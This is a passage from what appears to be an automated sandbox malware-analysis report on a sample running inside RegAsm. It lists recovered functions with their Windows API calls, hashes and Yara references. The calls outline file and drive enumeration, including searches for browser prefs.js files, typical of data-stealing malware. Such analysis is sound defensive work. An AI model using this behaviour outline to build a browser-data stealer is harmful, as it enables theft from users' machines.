                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040B463: _EH_prolog.MSVCRT ref: 0040B468
                                                                                      • Part of subcall function 0040B463: FindFirstFileA.KERNEL32(00000000,?,00000000,?,00425F68,?,?,00425C47,?,00000000,?), ref: 0040B4E7
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F6C,?,00000000,?), ref: 0040B50B
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,00425F70,?,00000000,?), ref: 0040B525
                                                                                      • Part of subcall function 0040B463: StrCmpCA.SHLWAPI(?,prefs.js,00000000,?,?,?,00425F74,?,?,00425C4A,?,00000000,?), ref: 0040B5C1
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$FileFindFirstFolderPathlstrlen
                                                                                    • String ID: \..\
                                                                                    • API String ID: 271224408-4220915743
                                                                                    • Opcode ID: 2fdf3e075c31b22ca8a354aaf151d811bcf78c1484277b32c5798bb14829cd02
                                                                                    • Instruction ID: 6c2274da3a54e78b00ef882603e8e3fe35884a936ae60c4e7c9158b4c67c68f5
                                                                                    • Opcode Fuzzy Hash: 2fdf3e075c31b22ca8a354aaf151d811bcf78c1484277b32c5798bb14829cd02
                                                                                    • Instruction Fuzzy Hash: DFA15FB1900288AACB14FBE5D556BDDBBB4AF19308F50417EE845736C2DB78170CCBA6
                                                                                    Function 00405E09 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (@
                                                                                    • API String ID: 0-1346038526
                                                                                    • Opcode ID: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                    • Instruction ID: a472476b622eda2900000c9113d1a74c1da44a18ff9f30f91f8d3e78ba7694db
                                                                                    • Opcode Fuzzy Hash: 14c096e7427ac56c3ceb53db33e20d9e6aa561a8e8b35fd361e21ef125d2a38f
                                                                                    • Instruction Fuzzy Hash: 2B4136B190461AAFCF14EF94D9909AFBBB1EB04314F10447FEA05B7391D6789A818F98
                                                                                    Function 00405D69 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualProtect.KERNEL32(?,?,00000002,00000002,?,00000000,?,?,00405E98), ref: 00405DE8
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 544645111-3916222277
                                                                                    • Opcode ID: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                    • Instruction ID: ced7d7a04c1373fcb48adb74aa7fd2d2290691d2abba1c02f51b3daadd827661
                                                                                    • Opcode Fuzzy Hash: b6b970fa2179954ca2d24890c2a9fa622aa91f7321e7267b4cd12840a3a9e1b1
                                                                                    • Instruction Fuzzy Hash: A7113A71515A0AEBEF20CF94C9887ABB7F5FF04340F6084279541E62C0D7789A85EFA9
                                                                                    Function 00411250 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SHFileOperationA.SHELL32(?), ref: 00411289
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileOperation
                                                                                    • String ID: ^qA
                                                                                    • API String ID: 3080627654-2929517337
                                                                                    • Opcode ID: b86a9cf137741d795d42c8fdc09233bf8a42cfbe6d8886dfb6df5f219da20288
                                                                                    • Instruction ID: cea7c5b2f21ce40cf92ecfc9ca7a06bfbd61282a3af7cf5c5322f6d4fd748434
                                                                                    • Opcode Fuzzy Hash: b86a9cf137741d795d42c8fdc09233bf8a42cfbe6d8886dfb6df5f219da20288
                                                                                    • Instruction Fuzzy Hash: BAE0E5B0E0021D9FCB44EFA4E5456EEBBF4FF08308F40806AC509F7240E3B452458BA9
                                                                                    Function 004104A2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentHwProfileA.ADVAPI32(?), ref: 004104B3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CurrentProfile
                                                                                    • String ID: Unknown
                                                                                    • API String ID: 2104809126-1654365787
                                                                                    • Opcode ID: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
                                                                                    • Instruction ID: 3d2c3ff73f9fd288211faec72780458d1f3465e1919466c86557ea86080fd633
                                                                                    • Opcode Fuzzy Hash: 5e10422413539b42bf5c0f3fa128b12628a931a4afcc5f0832f78eb075a7ee3b
                                                                                    • Instruction Fuzzy Hash: 49E01270A0010DFBDB10DBA4DA85FDE77BC6B04348F508525EA45D3181DBB8E649DBA9
                                                                                    Function 00410CDD Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00410CE2
                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFileH_prolog
                                                                                    • String ID:
                                                                                    • API String ID: 3244726999-0
                                                                                    • Opcode ID: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                    • Instruction ID: 23f90a50d93cb2e1358a652bfa6555910aea1ee46ff196ae4cba0ec79dbf811d
                                                                                    • Opcode Fuzzy Hash: 9858cde492175e4580259da3237b0586ce143e2643660db7b1ce31a318e284b7
                                                                                    • Instruction Fuzzy Hash: BEE09B305005149BC714AFA4E4016CDB720EF05764F10422EE866A25D5C7385B45C684
                                                                                    Function 00405A53 Relevance: 2.6, APIs: 2, Instructions: 68memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405AB2
                                                                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00405E55,00000000,00000000), ref: 00405ADE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                    • Instruction ID: 0100467e13e99263edfc9c933cb68e83bd3c9ecc7dabaf0022702558aaebf942
                                                                                    • Opcode Fuzzy Hash: 1c251f108aa80a173728c8da74072c4a570c277b0e51025ace0a2ede7004c7e8
                                                                                    • Instruction Fuzzy Hash: 2521AE71700B059BDB24CFB4CC81BABB7F5EB44314F24492AE61AD72D0D278AD408F18
                                                                                    Function 0040D3FA Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040D3FF
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,00425C93,00000000,00000000,?), ref: 00410D52
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426B18,?,00000000,004265C7), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425C4E,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040A893: _EH_prolog.MSVCRT ref: 0040A898
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 2625060131-0
                                                                                    • Opcode ID: 56088f79004cf497bad3f02a7e5291dcc555a9d03921c7f1e9fa0e27b921b9e5
                                                                                    • Instruction ID: 500d7c88a2085726728d35326e6952772f3e0e38a46ae67bbb90ee8c45411e9d
                                                                                    • Opcode Fuzzy Hash: 56088f79004cf497bad3f02a7e5291dcc555a9d03921c7f1e9fa0e27b921b9e5
                                                                                    • Instruction Fuzzy Hash: 53915EB1D0024CEADF15EBE5D952BDEBBB8AF18308F50417EE40573282DA78570C8B66
                                                                                    Function 0040A893 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 0040A898
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00409F72: _EH_prolog.MSVCRT ref: 00409F77
                                                                                      • Part of subcall function 00409F72: FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,?,?,00425C06,00000000,-00000020,00000000), ref: 00409FF6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1592259726-0
                                                                                    • Opcode ID: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                    • Instruction ID: 11f6703c6529ff65c6027a0a45f3fdb3f97caadc550874a50ef78dc79f4eaafe
                                                                                    • Opcode Fuzzy Hash: 04f1566bf03f5b57a7be48995494788b674163e3f1712f7d1c8d8cfa6d3f667e
                                                                                    • Instruction Fuzzy Hash: F62171B1900249EBDF20FFA9C9067DDBFB4AF45314F00416EE88963281D7795708CBA6
                                                                                    Function 00401ED6 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00401EDB
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                                      • Part of subcall function 00401162: _EH_prolog.MSVCRT ref: 00401167
                                                                                      • Part of subcall function 00401162: FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00422374,?,?,?,00422370,?,?,00000000,?,00000000), ref: 004013AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$FileFindFirstlstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 1592259726-0
                                                                                    • Opcode ID: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                    • Instruction ID: 28e08b363bcf4c13626f635e6ad0a869a568ad08ab8b3845b1d26a2f95c805ed
                                                                                    • Opcode Fuzzy Hash: 07963b33fdd111526faf395668dc4852c6ae53a02adfa156883a701ca86dbaae
                                                                                    • Instruction Fuzzy Hash: 4A215071D00249ABDF20FB69C94679DBFB4AF44714F00452EE89873282DB395749CBD6
                                                                                    Function 00415A3A Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00415A3F
                                                                                      • Part of subcall function 00412D62: _EH_prolog.MSVCRT ref: 00412D67
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 00415843: _EH_prolog.MSVCRT ref: 00415848
                                                                                      • Part of subcall function 00415843: GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004158AA
                                                                                      • Part of subcall function 00415843: memset.MSVCRT ref: 004158C9
                                                                                      • Part of subcall function 00415843: GetDriveTypeA.KERNEL32(?), ref: 004158D2
                                                                                      • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 004158F2
                                                                                      • Part of subcall function 00415843: lstrcpy.KERNEL32(?,00000000), ref: 00415933
                                                                                      • Part of subcall function 00415843: lstrlenA.KERNEL32(?), ref: 00415998
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000003.00000002.2039421679.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$Drivelstrcpy$LogicalStringsTypelstrlenmemset
                                                                                    • String ID:
                                                                                    • API String ID: 373919974-0
                                                                                    • Opcode ID: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                    • Instruction ID: 6a8f297f6f97b9a3cf0514685df13ca52355f4dbaeb7c4ae4b28d527b4ace486
                                                                                    • Opcode Fuzzy Hash: 247ae862db0cd230e0fc40c152aa8d8d011cf82cb158f3200b1f7138d282f6a1
                                                                                    • Instruction Fuzzy Hash: 5E01C031C00249DBCF20EBA8C9827EEBBB0EF40354F10411AE854A3281C7385B84C7D6
                                                                                    Function 00410D21 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
